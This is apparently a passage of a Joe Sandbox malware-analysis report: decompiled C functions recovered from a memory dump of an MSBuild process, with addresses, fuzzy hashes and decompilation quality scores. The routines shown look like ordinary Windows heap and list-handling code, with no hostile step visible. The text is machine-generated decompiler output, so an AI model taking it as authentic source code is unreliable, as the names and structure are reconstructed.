                                            						_t21 = _t30 & 0x00000006;
                                            						_t16 = _t30;
                                            						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                            						asm("lock cmpxchg [edi], esi");
                                            						if(_t16 == _t30) {
                                            							break;
                                            						}
                                            						_t30 = _t16;
                                            					}
                                            					_t36 = _v8;
                                            					if(_t21 == 2) {
                                            						_t16 = E010400C2(0x10f8608, 0, _t28);
                                            					}
                                            				}
                                            				if(_t36 != 0) {
                                            					_t16 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                            				}
                                            				return _t16;
                                            			}











                                            0x0103b395
                                            0x0103b3a2
                                            0x0103b3a5
                                            0x0103b3aa
                                            0x0103b3b2
                                            0x0103b3ba
                                            0x0103b3bd
                                            0x0103b3c0
                                            0x0103b3c4
                                            0x0103b3c9
                                            0x0107a3e9
                                            0x0107a3ed
                                            0x0107a3f0
                                            0x0107a3ff
                                            0x0107a403
                                            0x0107a409
                                            0x00000000
                                            0x00000000
                                            0x0107a40b
                                            0x0107a40b
                                            0x0107a40f
                                            0x0107a415
                                            0x0107a423
                                            0x0107a423
                                            0x0107a415
                                            0x0103b3d1
                                            0x0103b3e8
                                            0x0103b3e8
                                            0x0103b3d9

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1014fb3e0e8f0db1f322f01cf3d61a6333ddb945bb0f1be604723b1b18bc42ab
                                            • Instruction ID: a7766bf9a2908a0bdf0a56687632fa483ba3d2fd9260e7d32c5aaf579f05053e
                                            • Opcode Fuzzy Hash: 1014fb3e0e8f0db1f322f01cf3d61a6333ddb945bb0f1be604723b1b18bc42ab
                                            • Instruction Fuzzy Hash: BF116B337051209BCB198A18CD81AAF769AEBD9330B28817DEE96D7780C9319C02C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E01009240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t33;
                                            				intOrPtr _t37;
                                            				intOrPtr _t41;
                                            				intOrPtr* _t46;
                                            				void* _t48;
                                            				intOrPtr _t50;
                                            				intOrPtr* _t60;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				intOrPtr _t65;
                                            				void* _t66;
                                            				void* _t68;
                                            
                                            				_push(0xc);
                                            				_push(0x10df708);
                                            				E0105D08C(__ebx, __edi, __esi);
                                            				_t65 = __ecx;
                                            				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                            				if( *(__ecx + 0x24) != 0) {
                                            					_push( *(__ecx + 0x24));
                                            					E010495D0();
                                            					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                            				}
                                            				L6();
                                            				L6();
                                            				_push( *((intOrPtr*)(_t65 + 0x28)));
                                            				E010495D0();
                                            				_t33 =  *0x10f84c4; // 0x0
                                            				L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                            				_t37 =  *0x10f84c4; // 0x0
                                            				L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                            				_t41 =  *0x10f84c4; // 0x0
                                            				E01022280(L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x10f86b4);
                                            				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                            				_t46 = _t65 + 0xe8;
                                            				_t62 =  *_t46;
                                            				_t60 =  *((intOrPtr*)(_t46 + 4));
                                            				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                            					_t61 = 3;
                                            					asm("int 0x29");
                                            					_push(_t65);
                                            					_t66 = _t61;
                                            					_t23 = _t66 + 0x14; // 0x8df8084c
                                            					_push( *_t23);
                                            					E010495D0();
                                            					_t24 = _t66 + 0x10; // 0x89e04d8b
                                            					_push( *_t24);
                                            					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                            					_t48 = E010495D0();
                                            					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                            					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                            					return _t48;
                                            				} else {
                                            					 *_t60 = _t62;
                                            					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                            					 *(_t68 - 4) = 0xfffffffe;
                                            					E01009325();
                                            					_t50 =  *0x10f84c4; // 0x0
                                            					return E0105D0D1(L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                            				}
                                            			}















                                            0x01009240
                                            0x01009242
                                            0x01009247
                                            0x0100924c
                                            0x0100924e
                                            0x01009255
                                            0x01009257
                                            0x0100925a
                                            0x0100925f
                                            0x0100925f
                                            0x01009266
                                            0x01009271
                                            0x01009276
                                            0x01009279
                                            0x0100927e
                                            0x01009295
                                            0x0100929a
                                            0x010092b1
                                            0x010092b6
                                            0x010092d7
                                            0x010092dc
                                            0x010092e0
                                            0x010092e6
                                            0x010092e8
                                            0x010092ee
                                            0x01009332
                                            0x01009333
                                            0x01009337
                                            0x01009338
                                            0x0100933a
                                            0x0100933a
                                            0x0100933d
                                            0x01009342
                                            0x01009342
                                            0x01009345
                                            0x01009349
                                            0x0100934e
                                            0x01009352
                                            0x01009357
                                            0x010092f4
                                            0x010092f4
                                            0x010092f6
                                            0x010092f9
                                            0x01009300
                                            0x01009306
                                            0x01009324
                                            0x01009324

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5cc8d7d423c69fdae13170d81aad6115fc982350608f5119b059227a85f28fd7
                                            • Instruction ID: 60c6126432fd9d75ccea020553f61ef38837db5696b4824618b47a9c922ce5ca
                                            • Opcode Fuzzy Hash: 5cc8d7d423c69fdae13170d81aad6115fc982350608f5119b059227a85f28fd7
                                            • Instruction Fuzzy Hash: 10213971041601DFC762EF68CA40F9AB7F9BF28708F14856DE18986AA2CB35E941CB44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E01094257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr* _t27;
                                            				intOrPtr* _t30;
                                            				intOrPtr* _t31;
                                            				intOrPtr _t33;
                                            				intOrPtr* _t34;
                                            				intOrPtr* _t35;
                                            				void* _t37;
                                            				void* _t38;
                                            				void* _t39;
                                            				void* _t43;
                                            
                                            				_t39 = __eflags;
                                            				_t35 = __edi;
                                            				_push(8);
                                            				_push(0x10e08d0);
                                            				E0105D08C(__ebx, __edi, __esi);
                                            				_t37 = __ecx;
                                            				E010941E8(__ebx, __edi, __ecx, _t39);
                                            				E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                            				_t18 = _t37 + 8;
                                            				_t33 =  *_t18;
                                            				_t27 =  *((intOrPtr*)(_t18 + 4));
                                            				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                            					L8:
                                            					_push(3);
                                            					asm("int 0x29");
                                            				} else {
                                            					 *_t27 = _t33;
                                            					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                            					_t35 = 0x10f87e4;
                                            					_t18 =  *0x10f87e0; // 0x0
                                            					while(_t18 != 0) {
                                            						_t43 = _t18 -  *0x10f5cd0; // 0xffffffff
                                            						if(_t43 >= 0) {
                                            							_t31 =  *0x10f87e4; // 0x0
                                            							_t18 =  *_t31;
                                            							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                            								goto L8;
                                            							} else {
                                            								 *0x10f87e4 = _t18;
                                            								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                            								L01007055(_t31 + 0xfffffff8);
                                            								_t24 =  *0x10f87e0; // 0x0
                                            								_t18 = _t24 - 1;
                                            								 *0x10f87e0 = _t18;
                                            								continue;
                                            							}
                                            						}
                                            						goto L9;
                                            					}
                                            				}
                                            				L9:
                                            				__eflags =  *0x10f5cd0;
                                            				if( *0x10f5cd0 <= 0) {
                                            					L01007055(_t37);
                                            				} else {
                                            					_t30 = _t37 + 8;
                                            					_t34 =  *0x10f87e8; // 0x0
                                            					__eflags =  *_t34 - _t35;
                                            					if( *_t34 != _t35) {
                                            						goto L8;
                                            					} else {
                                            						 *_t30 = _t35;
                                            						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                            						 *_t34 = _t30;
                                            						 *0x10f87e8 = _t30;
                                            						 *0x10f87e0 = _t18 + 1;
                                            					}
                                            				}
                                            				 *(_t38 - 4) = 0xfffffffe;
                                            				return E0105D0D1(L01094320());
                                            			}















                                            0x01094257
                                            0x01094257
                                            0x01094257
                                            0x01094259
                                            0x0109425e
                                            0x01094263
                                            0x01094265
                                            0x01094273
                                            0x01094278
                                            0x0109427c
                                            0x0109427f
                                            0x01094281
                                            0x01094287
                                            0x010942d7
                                            0x010942d7
                                            0x010942da
                                            0x0109428d
                                            0x0109428d
                                            0x0109428f
                                            0x01094292
                                            0x01094297
                                            0x0109429c
                                            0x010942a0
                                            0x010942a6
                                            0x010942a8
                                            0x010942ae
                                            0x010942b3
                                            0x00000000
                                            0x010942ba
                                            0x010942ba
                                            0x010942bf
                                            0x010942c5
                                            0x010942ca
                                            0x010942cf
                                            0x010942d0
                                            0x00000000
                                            0x010942d0
                                            0x010942b3
                                            0x00000000
                                            0x010942a6
                                            0x0109429c
                                            0x010942dc
                                            0x010942dc
                                            0x010942e3
                                            0x01094309
                                            0x010942e5
                                            0x010942e5
                                            0x010942e8
                                            0x010942ee
                                            0x010942f0
                                            0x00000000
                                            0x010942f2
                                            0x010942f2
                                            0x010942f4
                                            0x010942f7
                                            0x010942f9
                                            0x01094300
                                            0x01094300
                                            0x010942f0
                                            0x0109430e
                                            0x0109431f

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bdfff31e24e8b173840bc34c7b31592dbe91d57c3ffce21b60a86a82043c47f4
                                            • Instruction ID: d99d1e248085cf9604e4d21ceff25ef526de60820cd1d2f57ab29bb0f53f7da1
                                            • Opcode Fuzzy Hash: bdfff31e24e8b173840bc34c7b31592dbe91d57c3ffce21b60a86a82043c47f4
                                            • Instruction Fuzzy Hash: B6216870A00702CFCB65DF68D221694BBE1FB45314B50C2EED1D5CB699D73AD452DB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 25%
                                            			E01032397(intOrPtr _a4) {
                                            				void* __ebx;
                                            				void* __ecx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed int _t11;
                                            				void* _t19;
                                            				void* _t25;
                                            				void* _t26;
                                            				intOrPtr _t27;
                                            				void* _t28;
                                            				void* _t29;
                                            
                                            				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                            				if( *0x10f848c != 0) {
                                            					L0102FAD0(0x10f8610);
                                            					if( *0x10f848c == 0) {
                                            						E0102FA00(0x10f8610, _t19, _t27, 0x10f8610);
                                            						goto L1;
                                            					} else {
                                            						_push(0);
                                            						_push(_a4);
                                            						_t26 = 4;
                                            						_t29 = E01032581(0x10f8610, 0xfe50a0, _t26, _t27, _t28);
                                            						E0102FA00(0x10f8610, 0xfe50a0, _t27, 0x10f8610);
                                            					}
                                            				} else {
                                            					L1:
                                            					_t11 =  *0x10f8614; // 0x0
                                            					if(_t11 == 0) {
                                            						_t11 = E01044886(0xfe1088, 1, 0x10f8614);
                                            					}
                                            					_push(0);
                                            					_push(_a4);
                                            					_t25 = 4;
                                            					_t29 = E01032581(0x10f8610, (_t11 << 4) + 0xfe5070, _t25, _t27, _t28);
                                            				}
                                            				if(_t29 != 0) {
                                            					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                            					 *((char*)(_t29 + 0x40)) = 0;
                                            				}
                                            				return _t29;
                                            			}















                                            0x010323b0
                                            0x010323b6
                                            0x01032409
                                            0x01032415
                                            0x01075ae9
                                            0x00000000
                                            0x0103241b
                                            0x0103241b
                                            0x0103241d
                                            0x01032427
                                            0x0103242e
                                            0x01032430
                                            0x01032430
                                            0x010323b8
                                            0x010323b8
                                            0x010323b8
                                            0x010323bf
                                            0x010323fc
                                            0x010323fc
                                            0x010323c1
                                            0x010323c3
                                            0x010323d0
                                            0x010323d8
                                            0x010323d8
                                            0x010323dc
                                            0x010323de
                                            0x010323e1
                                            0x010323e1
                                            0x010323ec

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9e0ee161f559ecfc9220d9f6a6f834dd7472a30bdd79894d5aad343d5bfcc88
                                            • Instruction ID: db351ce9a100b286dbd1af9d2a8e4699c26fac050ac4f4ce3ae32a50ef679a77
                                            • Opcode Fuzzy Hash: d9e0ee161f559ecfc9220d9f6a6f834dd7472a30bdd79894d5aad343d5bfcc88
                                            • Instruction Fuzzy Hash: EB112B7270075267E730A62E9C85B99B6DCEBE0F50F14C46EF7C297581CA74E8408754
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E010846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                            				signed short* _v8;
                                            				unsigned int _v12;
                                            				intOrPtr _v16;
                                            				signed int _t22;
                                            				signed char _t23;
                                            				short _t32;
                                            				void* _t38;
                                            				char* _t40;
                                            
                                            				_v12 = __edx;
                                            				_t29 = 0;
                                            				_v8 = __ecx;
                                            				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                            				_t38 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                            				if(_t38 != 0) {
                                            					_t40 = _a4;
                                            					 *_t40 = 1;
                                            					E0104F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                            					_t22 = _v12 >> 1;
                                            					_t32 = 0x2e;
                                            					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                            					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                            					_t23 = E0103D268(_t38, 1);
                                            					asm("sbb al, al");
                                            					 *_t40 =  ~_t23 + 1;
                                            					L010277F0(_v16, 0, _t38);
                                            				} else {
                                            					 *_a4 = 0;
                                            					_t29 = 0xc0000017;
                                            				}
                                            				return _t29;
                                            			}











                                            0x010846b7
                                            0x010846ba
                                            0x010846c5
                                            0x010846c8
                                            0x010846d0
                                            0x010846d4
                                            0x010846e6
                                            0x010846e9
                                            0x010846f4
                                            0x010846ff
                                            0x01084705
                                            0x01084706
                                            0x0108470c
                                            0x01084713
                                            0x0108471b
                                            0x01084723
                                            0x01084725
                                            0x010846d6
                                            0x010846d9
                                            0x010846db
                                            0x010846db
                                            0x01084732

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                            • Instruction ID: 824e178c20e7a245bf11662a7ca220b891b529ccadfa580955020839b5b25216
                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                            • Instruction Fuzzy Hash: 1C112572504209BBC701AF5CD8809BEB7B9EFA9300F1080AAF984C7350DA318D51C7A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 42%
                                            			E0100C962(char __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t19;
                                            				char _t22;
                                            				void* _t26;
                                            				void* _t27;
                                            				char _t32;
                                            				char _t34;
                                            				void* _t35;
                                            				void* _t37;
                                            				intOrPtr* _t38;
                                            				signed int _t39;
                                            
                                            				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                            				_v8 =  *0x10fd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                            				_t34 = __ecx;
                                            				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                            					_t26 = 0;
                                            					E0101EEF0(0x10f70a0);
                                            					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                            					if(E0108F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                            						L9:
                                            						E0101EB70(_t29, 0x10f70a0);
                                            						_t19 = _t26;
                                            						L2:
                                            						_pop(_t35);
                                            						_pop(_t37);
                                            						_pop(_t27);
                                            						return E0104B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                            					}
                                            					_t29 = _t34;
                                            					_t26 = E0108F1FC(_t34, _t32);
                                            					if(_t26 < 0) {
                                            						goto L9;
                                            					}
                                            					_t38 =  *0x10f70c0; // 0x0
                                            					while(_t38 != 0x10f70c0) {
                                            						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                            						_t38 =  *_t38;
                                            						_v12 = _t22;
                                            						if(_t22 != 0) {
                                            							_t29 = _t22;
                                            							 *0x10fb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                            							_v12();
                                            						}
                                            					}
                                            					goto L9;
                                            				}
                                            				_t19 = 0;
                                            				goto L2;
                                            			}


















                                            0x0100c96a
                                            0x0100c974
                                            0x0100c988
                                            0x0100c98a
                                            0x01077c9d
                                            0x01077c9f
                                            0x01077ca4
                                            0x01077cae
                                            0x01077cf0
                                            0x01077cf5
                                            0x01077cfa
                                            0x0100c992
                                            0x0100c996
                                            0x0100c997
                                            0x0100c998
                                            0x0100c9a3
                                            0x0100c9a3
                                            0x01077cb0
                                            0x01077cb7
                                            0x01077cbb
                                            0x00000000
                                            0x00000000
                                            0x01077cbd
                                            0x01077ce8
                                            0x01077cc5
                                            0x01077cc8
                                            0x01077cca
                                            0x01077cd0
                                            0x01077cd6
                                            0x01077cde
                                            0x01077ce4
                                            0x01077ce4
                                            0x01077cd0
                                            0x00000000
                                            0x01077ce8
                                            0x0100c990
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5bbd3a0ab9a3970a6debe2beb084bb7da2c862f756e95ac245e7b44f4496033d
                                            • Instruction ID: bd3ac97e6d1707dc77c5c0204fbdd7791d64d575299598a8c5019cc4b8d24bd7
                                            • Opcode Fuzzy Hash: 5bbd3a0ab9a3970a6debe2beb084bb7da2c862f756e95ac245e7b44f4496033d
                                            • Instruction Fuzzy Hash: BC11A03270064A9BD751AE28C98A96A77E5FF88650B00063CFAC587A51DB25EC10C7D5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E010437F5(void* __ecx, intOrPtr* __edx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t6;
                                            				intOrPtr _t13;
                                            				intOrPtr* _t20;
                                            				intOrPtr* _t27;
                                            				void* _t28;
                                            				intOrPtr* _t29;
                                            
                                            				_t27 = __edx;
                                            				_t28 = __ecx;
                                            				if(__edx == 0) {
                                            					E01022280(_t6, 0x10f8550);
                                            				}
                                            				_t29 = E0104387E(_t28);
                                            				if(_t29 == 0) {
                                            					L6:
                                            					if(_t27 == 0) {
                                            						E0101FFB0(0x10f8550, _t27, 0x10f8550);
                                            					}
                                            					if(_t29 == 0) {
                                            						return 0xc0000225;
                                            					} else {
                                            						if(_t27 != 0) {
                                            							goto L14;
                                            						}
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                            						goto L11;
                                            					}
                                            				} else {
                                            					_t13 =  *_t29;
                                            					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                            						L13:
                                            						_push(3);
                                            						asm("int 0x29");
                                            						L14:
                                            						 *_t27 = _t29;
                                            						L11:
                                            						return 0;
                                            					}
                                            					_t20 =  *((intOrPtr*)(_t29 + 4));
                                            					if( *_t20 != _t29) {
                                            						goto L13;
                                            					}
                                            					 *_t20 = _t13;
                                            					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                            					asm("btr eax, ecx");
                                            					goto L6;
                                            				}
                                            			}











                                            0x010437fa
                                            0x010437fc
                                            0x01043805
                                            0x01043808
                                            0x01043808
                                            0x01043814
                                            0x01043818
                                            0x01043846
                                            0x01043848
                                            0x0104384b
                                            0x0104384b
                                            0x01043852
                                            0x00000000
                                            0x01043854
                                            0x01043856
                                            0x00000000
                                            0x00000000
                                            0x01043863
                                            0x00000000
                                            0x01043863
                                            0x0104381a
                                            0x0104381a
                                            0x0104381f
                                            0x0104386e
                                            0x0104386e
                                            0x01043871
                                            0x01043873
                                            0x01043873
                                            0x01043868
                                            0x00000000
                                            0x01043868
                                            0x01043821
                                            0x01043826
                                            0x00000000
                                            0x00000000
                                            0x01043828
                                            0x0104382a
                                            0x01043841
                                            0x00000000
                                            0x01043841

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c23f6f1e776bace778100967c0ce228ff5af48f9dc6c6141b322ff37641b5ff9
                                            • Instruction ID: 8c5426f2e24affd4c4a2011799eeb4c582e738fc05b0b0ccd05dfa6dcfa5dd17
                                            • Opcode Fuzzy Hash: c23f6f1e776bace778100967c0ce228ff5af48f9dc6c6141b322ff37641b5ff9
                                            • Instruction Fuzzy Hash: 8801A1F29017319BE3278B1D9980A2AFBE6FF95A6071550BDE9C98F215D730C801C790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0103002D() {
                                            				void* _t11;
                                            				char* _t14;
                                            				signed char* _t16;
                                            				char* _t27;
                                            				signed char* _t29;
                                            
                                            				_t11 = E01027D50();
                                            				_t27 = 0x7ffe0384;
                                            				if(_t11 != 0) {
                                            					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            				} else {
                                            					_t14 = 0x7ffe0384;
                                            				}
                                            				_t29 = 0x7ffe0385;
                                            				if( *_t14 != 0) {
                                            					if(E01027D50() == 0) {
                                            						_t16 = 0x7ffe0385;
                                            					} else {
                                            						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            					}
                                            					if(( *_t16 & 0x00000040) != 0) {
                                            						goto L18;
                                            					} else {
                                            						goto L3;
                                            					}
                                            				} else {
                                            					L3:
                                            					if(E01027D50() != 0) {
                                            						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					}
                                            					if( *_t27 != 0) {
                                            						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                            							goto L5;
                                            						}
                                            						if(E01027D50() != 0) {
                                            							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            						}
                                            						if(( *_t29 & 0x00000020) == 0) {
                                            							goto L5;
                                            						}
                                            						L18:
                                            						return 1;
                                            					} else {
                                            						L5:
                                            						return 0;
                                            					}
                                            				}
                                            			}








                                            0x01030032
                                            0x01030037
                                            0x01030043
                                            0x01074b3a
                                            0x01030049
                                            0x01030049
                                            0x01030049
                                            0x0103004e
                                            0x01030053
                                            0x01074b48
                                            0x01074b5a
                                            0x01074b4a
                                            0x01074b53
                                            0x01074b53
                                            0x01074b5f
                                            0x00000000
                                            0x01074b61
                                            0x00000000
                                            0x01074b61
                                            0x01030059
                                            0x01030059
                                            0x01030060
                                            0x01074b6f
                                            0x01074b6f
                                            0x01030069
                                            0x01074b83
                                            0x00000000
                                            0x00000000
                                            0x01074b90
                                            0x01074b9b
                                            0x01074b9b
                                            0x01074ba4
                                            0x00000000
                                            0x00000000
                                            0x01074baa
                                            0x00000000
                                            0x0103006f
                                            0x0103006f
                                            0x00000000
                                            0x0103006f
                                            0x01030069

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                            • Instruction ID: 470cf566db68ca46d7881f795a2bb6a888ecabb87cadaa3d8f3978559c602327
                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                            • Instruction Fuzzy Hash: 7A11A132A066818FE7639B2CC944B79BBE8EB91754F0900E0FE84C7692D729DC41C668
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E0101766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                            				char _v8;
                                            				void* _t22;
                                            				void* _t24;
                                            				intOrPtr _t29;
                                            				intOrPtr* _t30;
                                            				void* _t42;
                                            				intOrPtr _t47;
                                            
                                            				_push(__ecx);
                                            				_t36 =  &_v8;
                                            				if(E0103F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                            					L10:
                                            					_t22 = 0;
                                            				} else {
                                            					_t24 = _v8 + __ecx;
                                            					_t42 = _t24;
                                            					if(_t24 < __ecx) {
                                            						goto L10;
                                            					} else {
                                            						if(E0103F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                            							goto L10;
                                            						} else {
                                            							_t29 = _v8 + _t42;
                                            							if(_t29 < _t42) {
                                            								goto L10;
                                            							} else {
                                            								_t47 = _t29;
                                            								_t30 = _a16;
                                            								if(_t30 != 0) {
                                            									 *_t30 = _t47;
                                            								}
                                            								if(_t47 == 0) {
                                            									goto L10;
                                            								} else {
                                            									_t22 = L01024620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t22;
                                            			}










                                            0x01017672
                                            0x0101767f
                                            0x01017689
                                            0x010176de
                                            0x010176de
                                            0x0101768b
                                            0x01017691
                                            0x01017693
                                            0x01017697
                                            0x00000000
                                            0x01017699
                                            0x010176a8
                                            0x00000000
                                            0x010176aa
                                            0x010176ad
                                            0x010176b1
                                            0x00000000
                                            0x010176b3
                                            0x010176b3
                                            0x010176b5
                                            0x010176ba
                                            0x010176bc
                                            0x010176bc
                                            0x010176c0
                                            0x00000000
                                            0x010176c2
                                            0x010176ce
                                            0x010176ce
                                            0x010176c0
                                            0x010176b1
                                            0x010176a8
                                            0x01017697
                                            0x010176d9

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                            • Instruction ID: d751ffc47b8f52e4a34c164cd7ac725fd0b8023350e1247a89bc688f2d18bf04
                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                            • Instruction Fuzzy Hash: BA01AC32700119ABD730DE9ECC45E9B7BADEF8C660F144964BA88CB258DA34DD01C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E01009080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                            				intOrPtr* _t51;
